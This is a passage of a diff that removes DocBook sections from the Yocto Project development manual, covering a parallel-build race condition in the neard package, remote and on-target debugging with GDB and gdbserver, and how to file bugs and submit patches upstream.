-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/nfc_copy.h include/near/nfc_copy.h
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/snep.h include/near/snep.h
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/version.h include/near/version.h
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/dbus.h include/near/dbus.h
-     | ./src/genbuiltin nfctype1 nfctype2 nfctype3 nfctype4 p2p > src/builtin.h
-     | i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/
-       build/build/tmp/sysroots/qemux86 -DHAVE_CONFIG_H -I. -I./include -I./src -I./gdbus  -I/home/pokybuild/
-       yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/include/glib-2.0
-       -I/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/
-       lib/glib-2.0/include  -I/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/
-       tmp/sysroots/qemux86/usr/include/dbus-1.0 -I/home/pokybuild/yocto-autobuilder/yocto-slave/
-       nightly-x86/build/build/tmp/sysroots/qemux86/usr/lib/dbus-1.0/include  -I/home/pokybuild/yocto-autobuilder/
-       yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/include/libnl3
-       -DNEAR_PLUGIN_BUILTIN -DPLUGINDIR=\""/usr/lib/near/plugins"\"
-       -DCONFIGDIR=\""/etc/neard\"" -O2 -pipe -g -feliminate-unused-debug-types -c
-       -o tools/snep-send.o tools/snep-send.c
-     | In file included from tools/snep-send.c:16:0:
-     | tools/../src/near.h:41:23: fatal error: near/dbus.h: No such file or directory
-     |  #include &lt;near/dbus.h&gt;
-     |                        ^
-     | compilation terminated.
-     | make[1]: *** [tools/snep-send.o] Error 1
-     | make[1]: *** Waiting for unfinished jobs....
-     | make: *** [all] Error 2
-     | ERROR: oe_runmake failed
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='reproducing-the-error'>
-                <title>Reproducing the Error</title>
-
-                <para>
-                    Because race conditions are intermittent, they do not
-                    manifest themselves every time you do the build.
-                    In fact, most times the build will complete without problems
-                    even though the potential race condition exists.
-                    Thus, once the error surfaces, you need a way to reproduce
-                    it.
-                </para>
-
-                <para>
-                    In this example, compiling the "neard" package is causing
-                    the problem.
-                    So the first thing to do is build "neard" locally.
-                    Before you start the build, set the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></ulink>
-                    variable in your <filename>local.conf</filename> file to
-                    a high number (e.g. "-j 20").
-                    Using a high value for <filename>PARALLEL_MAKE</filename>
-                    increases the chances of the race condition showing up:
-                    <literallayout class='monospaced'>
-     $ bitbake neard
-                    </literallayout>
-                </para>
-
-                <para>
-                    Once the local build for "neard" completes, start a
-                    <filename>devshell</filename> build:
-                    <literallayout class='monospaced'>
-     $ bitbake neard -c devshell
-                    </literallayout>
-                    For information on how to use a
-                    <filename>devshell</filename>, see the
-                    "<link linkend='platdev-appdev-devshell'>Using a Development Shell</link>"
-                    section.
-                </para>
-
-                <para>
-                    In the <filename>devshell</filename>, do the following:
-                    <literallayout class='monospaced'>
-     $ make clean
-     $ make tools/snep-send.o
-                    </literallayout>
-                    The <filename>devshell</filename> commands cause the failure
-                    to clearly be visible.
-                    In this case, a missing dependency exists for the "neard"
-                    Makefile target.
-                    Here is some abbreviated, sample output with the
-                    missing dependency clearly visible at the end:
-                    <literallayout class='monospaced'>
-     i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/home/scott-lenovo/......
-        .
-        .
-        .
-     tools/snep-send.c
-     In file included from tools/snep-send.c:16:0:
-     tools/../src/near.h:41:23: fatal error: near/dbus.h: No such file or directory
-      #include &lt;near/dbus.h&gt;
-                       ^
-     compilation terminated.
-     make: *** [tools/snep-send.o] Error 1
-     $
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='creating-a-patch-for-the-fix'>
-                <title>Creating a Patch for the Fix</title>
-
-                <para>
-                    Because there is a missing dependency for the Makefile
-                    target, you need to patch the
-                    <filename>Makefile.am</filename> file, which is generated
-                    from <filename>Makefile.in</filename>.
-                    You can use Quilt to create the patch:
-                    <literallayout class='monospaced'>
-     $ quilt new parallelmake.patch
-     Patch patches/parallelmake.patch is now on top
-     $ quilt add Makefile.am
-     File Makefile.am added to patch patches/parallelmake.patch
-                    </literallayout>
-                    For more information on using Quilt, see the
-                    "<link linkend='using-a-quilt-workflow'>Using Quilt in Your Workflow</link>"
-                    section.
-                </para>
-
-                <para>
-                    At this point you need to make the edits to
-                    <filename>Makefile.am</filename> to add the missing
-                    dependency.
-                    For our example, you have to add the following line
-                    to the file:
-                    <literallayout class='monospaced'>
-     tools/snep-send.$(OBJEXT): include/near/dbus.h
-                    </literallayout>
-                </para>
-
-                <para>
-                    Once you have edited the file, use the
-                    <filename>refresh</filename> command to create the patch:
-                    <literallayout class='monospaced'>
-     $ quilt refresh
-     Refreshed patch patches/parallelmake.patch
-                    </literallayout>
-                    Once the patch file exists, you need to add it back to the
-                    originating recipe folder.
-                    Here is an example assuming a top-level
-                    <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                    named <filename>poky</filename>:
-                    <literallayout class='monospaced'>
-     $ cp patches/parallelmake.patch poky/meta/recipes-connectivity/neard/neard
-                    </literallayout>
-                    The final thing you need to do to implement the fix in the
-                    build is to update the "neard" recipe (i.e.
-                    <filename>neard-0.14.bb</filename>) so that the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                    statement includes the patch file.
-                    The recipe file is in the folder above the patch.
-                    Here is what the edited <filename>SRC_URI</filename>
-                    statement would look like:
-                    <literallayout class='monospaced'>
-     SRC_URI = "${KERNELORG_MIRROR}/linux/network/nfc/${BPN}-${PV}.tar.xz \
-                file://neard.in \
-                file://neard.service.in \
-                file://parallelmake.patch \
-               "
-                    </literallayout>
-                </para>
-
-                <para>
-                    With the patch complete and moved to the correct folder and
-                    the <filename>SRC_URI</filename> statement updated, you can
-                    exit the <filename>devshell</filename>:
-                    <literallayout class='monospaced'>
-     $ exit
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='testing-the-build'>
-                <title>Testing the Build</title>
-
-                <para>
-                    With everything in place, you can get back to trying the
-                    build again locally:
-                    <literallayout class='monospaced'>
-     $ bitbake neard
-                    </literallayout>
-                    This build should succeed.
-                </para>
-
-                <para>
-                    Now you can open up a <filename>devshell</filename> again
-                    and repeat the clean and make operations as follows:
-                    <literallayout class='monospaced'>
-     $ bitbake neard -c devshell
-     $ make clean
-     $ make tools/snep-send.o
-                    </literallayout>
-                    The build should work without issue.
-                </para>
-
-                <para>
-                    As with all solved problems, if they originated upstream,
-                    you need to submit the fix for the recipe in OE-Core and
-                    upstream so that the problem is taken care of at its
-                    source.
-                    See the
-                    "<link linkend='how-to-submit-a-change'>Submitting a Change to the Yocto Project</link>"
-                    section for more information.
-                </para>
-            </section>
-        </section>
-
-        <section id="platdev-gdb-remotedebug">
-            <title>Debugging With the GNU Project Debugger (GDB) Remotely</title>
-
-            <para>
-                GDB allows you to examine running programs, which in turn helps
-                you to understand and fix problems.
-                It also allows you to perform post-mortem style analysis of
-                program crashes.
-                GDB is available as a package within the Yocto Project and is
-                installed in SDK images by default.
-                See the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
-                chapter in the Yocto Project Reference Manual for a description of
-                these images.
-                You can find information on GDB at
-                <ulink url="http://sourceware.org/gdb/"/>.
-                <note><title>Tip</title>
-                    For best results, install debug (<filename>-dbg</filename>)
-                    packages for the applications you are going to debug.
-                    Doing so makes extra debug symbols available that give you
-                    more meaningful output.
-                </note>
-            </para>
-
-            <para>
-                Sometimes, due to memory or disk space constraints, it is not
-                possible to use GDB directly on the remote target to debug
-                applications.
-                These constraints arise because GDB needs to load the debugging
-                information and the binaries of the process being debugged.
-                Additionally, GDB needs to perform many computations to locate
-                information such as function names, variable names and values,
-                stack traces and so forth - even before starting the debugging
-                process.
-                These extra computations place more load on the target system
-                and can alter the characteristics of the program being debugged.
-            </para>
-
-            <para>
-                To help get past the previously mentioned constraints, you can
-                use gdbserver, which runs on the remote target and does not
-                load any debugging information from the debugged process.
-                Instead, a GDB instance processes the debugging information that
-                is run on a remote computer - the host GDB.
-                The host GDB then sends control commands to gdbserver to make
-                it stop or start the debugged program, as well as read or write
-                memory regions of that debugged program.
-                All the debugging information loaded and processed as well
-               as all the heavy debugging is done by the host GDB.
-                Offloading these processes gives the gdbserver running on the
-                target a chance to remain small and fast.
-            </para>
-
-            <para>
-                Because the host GDB is responsible for loading the debugging
-                information and for doing the necessary processing to make
-                actual debugging happen, you have to make sure the host can
-                access the unstripped binaries complete with their debugging
-                information and also be sure the target is compiled with no
-                optimizations.
-                The host GDB must also have local access to all the libraries
-                used by the debugged program.
-                Because gdbserver does not need any local debugging information,
-                the binaries on the remote target can remain stripped.
-                However, the binaries must also be compiled without optimization
-                so they match the host's binaries.
-            </para>
-
-            <para>
-                To remain consistent with GDB documentation and terminology,
-                the binary being debugged on the remote target machine is
-                referred to as the "inferior" binary.
-                For documentation on GDB see the
-                <ulink url="http://sourceware.org/gdb/documentation/">GDB site</ulink>.
-            </para>
-
-            <para>
-                The following steps show you how to debug using the GNU project
-                debugger.
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Configure your build system to construct the
-                        companion debug filesystem:</emphasis></para>
-
-                        <para>In your <filename>local.conf</filename> file, set
-                        the following:
-                        <literallayout class='monospaced'>
-     IMAGE_GEN_DEBUGFS = "1"
-     IMAGE_FSTYPES_DEBUGFS = "tar.bz2"
-                        </literallayout>
-                        These options cause the OpenEmbedded build system
-                        to generate a special companion filesystem fragment,
-                        which contains the matching source and debug symbols to
-                        your deployable filesystem.
-                        The build system does this by looking at what is in the
-                        deployed filesystem, and pulling the corresponding
-                        <filename>-dbg</filename> packages.</para>
-
-                        <para>The companion debug filesystem is not a complete
-                        filesystem, but only contains the debug fragments.
-                        This filesystem must be combined with the full filesystem
-                        for debugging.
-                        Subsequent steps in this procedure show how to combine
-                        the partial filesystem with the full filesystem.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Configure the system to include gdbserver in
-                        the target filesystem:</emphasis></para>
-
-                        <para>Make the following addition in either your
-                        <filename>local.conf</filename> file or in an image
-                        recipe:
-                        <literallayout class='monospaced'>
-     IMAGE_INSTALL_append = “ gdbserver"
-                        </literallayout>
-                        The change makes sure the <filename>gdbserver</filename>
-                        package is included.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build the environment:</emphasis></para>
-
-                        <para>Use the following command to construct the image
-                        and the companion Debug Filesystem:
-                        <literallayout class='monospaced'>
-     $ bitbake <replaceable>image</replaceable>
-                        </literallayout>
-                        Build the cross GDB component and make it available
-                        for debugging.
-                        Build the SDK that matches the image.
-                        Building the SDK is best for a production build
-                        that can be used later for debugging, especially
-                        during long term maintenance:
-                        <literallayout class='monospaced'>
-     $ bitbake -c populate_sdk <replaceable>image</replaceable>
-                        </literallayout></para>
-
-                        <para>Alternatively, you can build the minimal
-                        toolchain components that match the target.
-                        Doing so creates a smaller than typical SDK and only
-                        contains a minimal set of components with which to
-                        build simple test applications, as well as run the
-                        debugger:
-                        <literallayout class='monospaced'>
-     $ bitbake meta-toolchain
-                        </literallayout></para>
-
-                        <para>A final method is to build Gdb itself within
-                        the build system:
-                        <literallayout class='monospaced'>
-     $ bitbake gdb-cross-<replaceable>architecture</replaceable>
-                        </literallayout>
-                        Doing so produces a temporary copy of
-                        <filename>cross-gdb</filename> you can use for
-                        debugging during development.
-                        While this is the quickest approach, the two previous
-                        methods in this step are better when considering
-                        long-term maintenance strategies.
-                        <note>
-                            If you run
-                            <filename>bitbake gdb-cross</filename>, the
-                            OpenEmbedded build system suggests the actual
-                            image (e.g. <filename>gdb-cross-i586</filename>).
-                            The suggestion is usually the actual name you want
-                            to use.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Set up the</emphasis>&nbsp;<filename>debugfs</filename></para>
-
-                        <para>Run the following commands to set up the
-                        <filename>debugfs</filename>:
-                        <literallayout class='monospaced'>
-     $ mkdir debugfs
-     $ cd debugfs
-     $ tar xvfj <replaceable>build-dir</replaceable>/tmp-glibc/deploy/images/<replaceable>machine</replaceable>/<replaceable>image</replaceable>.rootfs.tar.bz2
-     $ tar xvfj <replaceable>build-dir</replaceable>/tmp-glibc/deploy/images/<replaceable>machine</replaceable>/<replaceable>image</replaceable>-dbg.rootfs.tar.bz2
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Set up GDB</emphasis></para>
-
-                        <para>Install the SDK (if you built one) and then
-                        source the correct environment file.
-                        Sourcing the environment file puts the SDK in your
-                        <filename>PATH</filename> environment variable.</para>
-
-                        <para>If you are using the build system, Gdb is
-                        located in
-                        <replaceable>build-dir</replaceable>/tmp/sysroots/<replaceable>host</replaceable>/usr/bin/<replaceable>architecture</replaceable>/<replaceable>architecture</replaceable>-gdb
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Boot the target:</emphasis></para>
-
-                        <para>For information on how to run QEMU, see the
-                        <ulink url='http://wiki.qemu.org/Documentation/GettingStartedDevelopers'>QEMU Documentation</ulink>.
-                        <note>
-                            Be sure to verify that your host can access the
-                            target via TCP.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Debug a program:</emphasis></para>
-
-                        <para>Debugging a program involves running gdbserver
-                        on the target and then running Gdb on the host.
-                        The example in this step debugs
-                        <filename>gzip</filename>:
-                        <literallayout class='monospaced'>
-     root@qemux86:~# gdbserver localhost:1234 /bin/gzip —help
-                        </literallayout>
-                        For additional gdbserver options, see the
-                        <ulink url='https://www.gnu.org/software/gdb/documentation/'>GDB Server Documentation</ulink>.
-                        </para>
-
-                        <para>After running gdbserver on the target, you need
-                        to run Gdb on the host and configure it and connect to
-                        the target.
-                        Use these commands:
-                        <literallayout class='monospaced'>
-     $ cd <replaceable>directory-holding-the-debugfs-directory</replaceable>
-     $ <replaceable>arch</replaceable>-gdb
-
-     (gdb) set sysroot debugfs
-     (gdb) set substitute-path /usr/src/debug debugfs/usr/src/debug
-     (gdb) target remote <replaceable>IP-of-target</replaceable>:1234
-                        </literallayout>
-                        At this point, everything should automatically load
-                        (i.e. matching binaries, symbols and headers).
-                        <note>
-                            The Gdb <filename>set</filename> commands in the
-                            previous example can be placed into the users
-                           <filename>~/.gdbinit</filename> file.
-                            Upon starting, Gdb automatically runs whatever
-                            commands are in that file.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Deploying without a full image
-                        rebuild:</emphasis></para>
-
-                        <para>In many cases, during development you want a
-                        quick method to deploy a new binary to the target and
-                        debug it, without waiting for a full image build.
-                        </para>
-
-                        <para>One approach to solving this situation is to
-                        just build the component you want to debug.
-                        Once you have built the component, copy the
-                        executable directly to both the target and the
-                        host <filename>debugfs</filename>.</para>
-
-                        <para>If the binary is processed through the debug
-                        splitting in OpenEmbedded, you should also
-                        copy the debug items (i.e. <filename>.debug</filename>
-                        contents and corresponding
-                        <filename>/usr/src/debug</filename> files)
-                        from the work directory.
-                        Here is an example:
-                        <literallayout class='monospaced'>
-     $ bitbake bash
-     $ bitbake -c devshell bash
-     $ cd ..
-     $ scp packages-split/bash/bin/bash <replaceable>target</replaceable>:/bin/bash
-     $ cp -a packages-split/bash-dbg/* <replaceable>path</replaceable>/debugfs
-                        </literallayout>
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-
-        <section id='debugging-with-the-gnu-project-debugger-gdb-on-the-target'>
-            <title>Debugging with the GNU Project Debugger (GDB) on the Target</title>
-
-            <para>
-                The previous section addressed using GDB remotely for debugging
-                purposes, which is the most usual case due to the inherent
-                hardware limitations on many embedded devices.
-                However, debugging in the target hardware itself is also
-                possible with more powerful devices.
-                This section describes what you need to do in order to support
-                using GDB to debug on the target hardware.
-            </para>
-
-            <para>
-                To support this kind of debugging, you need do the following:
-                <itemizedlist>
-                    <listitem><para>
-                        Ensure that GDB is on the target.
-                        You can do this by adding "gdb" to
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>:
-                        <literallayout class='monospaced'>
-     IMAGE_INSTALL_append = " gdb"
-                        </literallayout>
-                        Alternatively, you can add "tools-debug" to
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>:
-                        <literallayout class='monospaced'>
-     IMAGE_FEATURES_append = " tools-debug"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        Ensure that debug symbols are present.
-                        You can make sure these symbols are present by
-                        installing <filename>-dbg</filename>:
-                        <literallayout class='monospaced'>
-     IMAGE_INSTALL_append = " <replaceable>packagename</replaceable>-dbg"
-                        </literallayout>
-                        Alternatively, you can do the following to include all
-                        the debug symbols:
-                        <literallayout class='monospaced'>
-     IMAGE_FEATURES_append = " dbg-pkgs"
-                        </literallayout>
-                        </para></listitem>
-                </itemizedlist>
-                <note>
-                    To improve the debug information accuracy, you can reduce
-                    the level of optimization used by the compiler.
-                    For example, when adding the following line to your
-                    <filename>local.conf</filename> file, you will reduce
-                    optimization from
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-FULL_OPTIMIZATION'><filename>FULL_OPTIMIZATION</filename></ulink>
-                    of "-O2" to
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-DEBUG_OPTIMIZATION'><filename>DEBUG_OPTIMIZATION</filename></ulink>
-                    of "-O -fno-omit-frame-pointer":
-                    <literallayout class='monospaced'>
-     DEBUG_BUILD = "1"
-                    </literallayout>
-                    Consider that this will reduce the application's performance
-                    and is recommended only for debugging purposes.
-                </note>
-            </para>
-        </section>
-
-        <section id='dev-other-debugging-others'>
-            <title>Other Debugging Tips</title>
-
-            <para>
-                Here are some other tips that you might find useful:
-                <itemizedlist>
-                    <listitem><para>
-                        When adding new packages, it is worth watching for
-                        undesirable items making their way into compiler command
-                        lines.
-                        For example, you do not want references to local system
-                        files like
-                        <filename>/usr/lib/</filename> or
-                        <filename>/usr/include/</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        If you want to remove the <filename>psplash</filename>
-                        boot splashscreen,
-                        add <filename>psplash=false</filename> to  the kernel
-                        command line.
-                        Doing so prevents <filename>psplash</filename> from
-                        loading and thus allows you to see the console.
-                        It is also possible to switch out of the splashscreen by
-                        switching the virtual console (e.g. Fn+Left or Fn+Right
-                        on a Zaurus).
-                        </para></listitem>
-                    <listitem><para>
-                        Removing
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
-                        (usually <filename>tmp/</filename>, within the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>)
-                        can often fix temporary build issues.
-                        Removing <filename>TMPDIR</filename> is usually a
-                        relatively cheap operation, because task output will be
-                        cached in
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>
-                        (usually <filename>sstate-cache/</filename>, which is
-                        also in the Build Directory).
-                        <note>
-                            Removing <filename>TMPDIR</filename> might be a
-                            workaround rather than a fix.
-                            Consequently, trying to determine the underlying
-                            cause of an issue before removing the directory is
-                            a good idea.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        Understanding how a feature is used in practice within
-                        existing recipes can be very helpful.
-                        It is recommended that you configure some method that
-                        allows you to quickly search through files.</para>
-
-                        <para>Using GNU Grep, you can use the following shell
-                        function to recursively search through common
-                        recipe-related files, skipping binary files,
-                        <filename>.git</filename> directories, and the
-                        Build Directory (assuming its name starts with
-                        "build"):
-                        <literallayout class='monospaced'>
-     g() {
-         grep -Ir \
-              --exclude-dir=.git \
-              --exclude-dir='build*' \
-              --include='*.bb*' \
-              --include='*.inc*' \
-              --include='*.conf*' \
-              --include='*.py*' \
-              "$@"
-     }
-                        </literallayout>
-                        Following are some usage examples:
-                        <literallayout class='monospaced'>
-     $ g FOO    # Search recursively for "FOO"
-     $ g -i foo # Search recursively for "foo", ignoring case
-     $ g -w FOO # Search recursively for "FOO" as a word, ignoring e.g. "FOOBAR"
-                        </literallayout>
-                        If figuring out how some feature works requires a lot of
-                        searching, it might indicate that the documentation
-                        should be extended or improved.
-                        In such cases, consider filing a documentation bug using
-                        the Yocto Project implementation of
-                        <ulink url='https://bugzilla.yoctoproject.org/'>Bugzilla</ulink>.
-                        For information on how to submit a bug against
-                        the Yocto Project, see the Yocto Project Bugzilla
-                        <ulink url='&YOCTO_WIKI_URL;/wiki/Bugzilla_Configuration_and_Bug_Tracking'>wiki page</ulink>
-                        and the
-                        "<link linkend='submitting-a-defect-against-the-yocto-project'>Submitting a Defect Against the Yocto Project</link>"
-                        section.
-                        <note>
-                            The manuals might not be the right place to document
-                            variables that are purely internal and have a
-                            limited scope (e.g. internal variables used to
-                            implement a single <filename>.bbclass</filename>
-                            file).
-                        </note>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id='making-changes-to-the-yocto-project'>
-        <title>Making Changes to the Yocto Project</title>
-
-        <para>
-            Because the Yocto Project is an open-source, community-based
-            project, you can effect changes to the project.
-            This section presents procedures that show you how to submit
-            a defect against the project and how to submit a change.
-        </para>
-
-        <section id='submitting-a-defect-against-the-yocto-project'>
-            <title>Submitting a Defect Against the Yocto Project</title>
-
-            <para>
-                Use the Yocto Project implementation of
-                <ulink url='http://www.bugzilla.org/about/'>Bugzilla</ulink>
-                to submit a defect (bug) against the Yocto Project.
-                For additional information on this implementation of Bugzilla see the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#resources-bugtracker'>Yocto Project Bugzilla</ulink>"
-                section in the Yocto Project Reference Manual.
-                For more detail on any of the following steps, see the Yocto Project
-                <ulink url='&YOCTO_WIKI_URL;/wiki/Bugzilla_Configuration_and_Bug_Tracking'>Bugzilla wiki page</ulink>.
-            </para>
-
-            <para>
-                Use the following general steps to submit a bug"
-
-                <orderedlist>
-                    <listitem><para>
-                        Open the Yocto Project implementation of
-                        <ulink url='&YOCTO_BUGZILLA_URL;'>Bugzilla</ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        Click "File a Bug" to enter a new bug.
-                        </para></listitem>
-                    <listitem><para>
-                        Choose the appropriate "Classification", "Product", and
-                        "Component" for which the bug was found.
-                        Bugs for the Yocto Project fall into one of several
-                        classifications, which in turn break down into several
-                        products and components.
-                        For example, for a bug against the
-                        <filename>meta-intel</filename> layer, you would choose
-                        "Build System, Metadata &amp; Runtime", "BSPs", and
-                        "bsps-meta-intel", respectively.
-                        </para></listitem>
-                    <listitem><para>
-                        Choose the "Version" of the Yocto Project for which you found
-                        the bug (e.g. &DISTRO;).
-                        </para></listitem>
-                    <listitem><para>
-                        Determine and select the "Severity" of the bug.
-                        The severity indicates how the bug impacted your work.
-                        </para></listitem>
-                    <listitem><para>
-                        Choose the "Hardware" that the bug impacts.
-                        </para></listitem>
-                    <listitem><para>
-                        Choose the "Architecture" that the bug impacts.
-                        </para></listitem>
-                    <listitem><para>
-                        Choose a "Documentation change" item for the bug.
-                        Fixing a bug might or might not affect the Yocto Project
-                        documentation.
-                        If you are unsure of the impact to the documentation, select
-                        "Don't Know".
-                        </para></listitem>
-                    <listitem><para>
-                        Provide a brief "Summary" of the bug.
-                        Try to limit your summary to just a line or two and be sure
-                        to capture the essence of the bug.
-                        </para></listitem>
-                    <listitem><para>
-                        Provide a detailed "Description" of the bug.
-                        You should provide as much detail as you can about the context,
-                        behavior, output, and so forth that surrounds the bug.
-                        You can even attach supporting files for output from logs by
-                        using the "Add an attachment" button.
-                        </para></listitem>
-                    <listitem><para>
-                        Click the "Submit Bug" button submit the bug.
-                        A new Bugzilla number is assigned to the bug and the defect
-                        is logged in the bug tracking system.
-                        </para></listitem>
-                </orderedlist>
-                Once you file a bug, the bug is processed by the Yocto Project Bug
-                Triage Team and further details concerning the bug are assigned
-                (e.g. priority and owner).
-                You are the "Submitter" of the bug and any further categorization,
-                progress, or comments on the bug result in Bugzilla sending you an
-                automated email concerning the particular change or progress to the
-                bug.
-            </para>
-        </section>
-
-        <section id='how-to-submit-a-change'>
-            <title>Submitting a Change to the Yocto Project</title>
-
-            <para>
-                Contributions to the Yocto Project and OpenEmbedded are very welcome.
-                Because the system is extremely configurable and flexible, we recognize
-                that developers will want to extend, configure or optimize it for
-                their specific uses.
-            </para>
-
-            <para>
-                The Yocto Project uses a mailing list and a patch-based workflow
-                that is similar to the Linux kernel but contains important
-                differences.
-                In general, a mailing list exists through which you can submit
-                patches.
-                You should send patches to the appropriate mailing list so that they
-                can be reviewed and merged by the appropriate maintainer.
-                The specific mailing list you need to use depends on the
-                location of the code you are changing.
-                Each component (e.g. layer) should have a
-                <filename>README</filename> file that indicates where to send
-                the changes and which process to follow.
-            </para>
-
-            <para>
-                You can send the patch to the mailing list using whichever approach
-                you feel comfortable with to generate the patch.
-                Once sent, the patch is usually reviewed by the community at large.
-                If somebody has concerns with the patch, they will usually voice
-                their concern over the mailing list.
-                If a patch does not receive any negative reviews, the maintainer of
-                the affected layer typically takes the patch, tests it, and then
-                based on successful testing, merges the patch.
-            </para>
-
-            <para id='figuring-out-the-mailing-list-to-use'>
-                The "poky" repository, which is the Yocto Project's reference build
-                environment, is a hybrid repository that contains several
-                individual pieces (e.g. BitBake, Metadata, documentation,
-                and so forth) built using the combo-layer tool.
-                The upstream location used for submitting changes varies by
-                component:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Core Metadata:</emphasis>
-                        Send your patch to the
-                        <ulink url='http://lists.openembedded.org/mailman/listinfo/openembedded-core'>openembedded-core</ulink>
-                        mailing list.  For example, a change to anything under
-                        the <filename>meta</filename> or
-                        <filename>scripts</filename> directories should be sent
-                        to this mailing list.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>BitBake:</emphasis>
-                        For changes to BitBake (i.e. anything under the
-                        <filename>bitbake</filename> directory), send your patch
-                        to the
-                        <ulink url='http://lists.openembedded.org/mailman/listinfo/bitbake-devel'>bitbake-devel</ulink>
-                        mailing list.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>"meta-*" trees:</emphasis>
-                        These trees contain Metadata.
-                        Use the
-                        <ulink url='https://lists.yoctoproject.org/listinfo/poky'>poky</ulink>
-                        mailing list.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                For changes to other layers hosted in the Yocto Project source
-                repositories (i.e. <filename>yoctoproject.org</filename>), tools,
-                and the Yocto Project documentation, use the
-                <ulink url='https://lists.yoctoproject.org/listinfo/yocto'>Yocto Project</ulink>
-                general mailing list.
-                <note>
-                    Sometimes a layer's documentation specifies to use a
-                    particular mailing list.
-                    If so, use that list.
-                </note>
-                For additional recipes that do not fit into the core Metadata, you
-                should determine which layer the recipe should go into and submit
-                the change in the manner recommended by the documentation (e.g.
-                the <filename>README</filename> file) supplied with the layer.
-                If in doubt, please ask on the Yocto general mailing list or on
-                the openembedded-devel mailing list.
-            </para>
-
-            <para>
-                You can also push a change upstream and request a maintainer to
-                pull the change into the component's upstream repository.
-                You do this by pushing to a contribution repository that is upstream.
-                See the
-                "<ulink url='&YOCTO_DOCS_OM_URL;#gs-git-workflows-and-the-yocto-project'>Git Workflows and the Yocto Project</ulink>"
-                section in the Yocto Project Overview and Concepts Manual for additional
-                concepts on working in the Yocto Project development environment.
-            </para>
-
-            <para>
-                Two commonly used testing repositories exist for
-                OpenEmbedded-Core:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>"ross/mut" branch:</emphasis>
-                        The "mut" (master-under-test) tree
-                        exists in the <filename>poky-contrib</filename> repository
-                        in the
-                        <ulink url='&YOCTO_GIT_URL;'>Yocto Project source repositories</ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>"master-next" branch:</emphasis>
-                        This branch is part of the main
-                        "poky" repository in the Yocto Project source repositories.
-                        </para></listitem>
-                </itemizedlist>
-                Maintainers use these branches to test submissions prior to merging
-                patches.
-                Thus, you can get an idea of the status of a patch based on
-                whether the patch has been merged into one of these branches.
-                <note>
-                    This system is imperfect and changes can sometimes get lost in the
-                    flow.
-                    Asking about the status of a patch or change is reasonable if the
-                    change has been idle for a while with no feedback.
-                    The Yocto Project does have plans to use
-                    <ulink url='https://en.wikipedia.org/wiki/Patchwork_(software)'>Patchwork</ulink>
-                    to track the status of patches and also to automatically preview
-                    patches.
-                </note>
-            </para>
-
-            <para>
-                The following sections provide procedures for submitting a change.
-            </para>
-
-            <section id='pushing-a-change-upstream'>
-                <title>Using Scripts to Push a Change Upstream and Request a Pull</title>
-
-                <para>
-                    Follow this procedure to push a change to an upstream "contrib"
-                    Git repository:
-                    <note>
-                        You can find general Git information on how to push a change
-                        upstream in the
-                        <ulink url='http://git-scm.com/book/en/v2/Distributed-Git-Distributed-Workflows'>Git Community Book</ulink>.
-                    </note>
-                    <orderedlist>
-                        <listitem><para>
